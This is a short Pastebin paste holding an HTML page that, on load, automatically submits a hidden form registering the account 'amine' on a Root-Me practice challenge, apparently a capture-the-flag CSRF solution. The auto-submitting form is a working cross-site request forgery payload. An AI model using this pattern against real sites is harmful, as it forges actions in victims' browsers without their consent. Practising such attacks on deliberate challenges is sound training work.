Advertisement
en1ma

Untitled

Feb 25th, 2020
411
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.33 KB | None | 0 0
  1.  <html>
  2.   <body>
  3.     <form action="http://challenge01.root-me.org/realiste/ch16/index.php?page=register.php" method="POST">
  4.       <input type="hidden" name="username" value="amine" />
  5.       <input type="hidden" name="password" value="lol" />
  6.     </form>
  7.     <script>
  8.       document.forms[0].submit();
  9.     </script>
  10.   </body>
  11. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement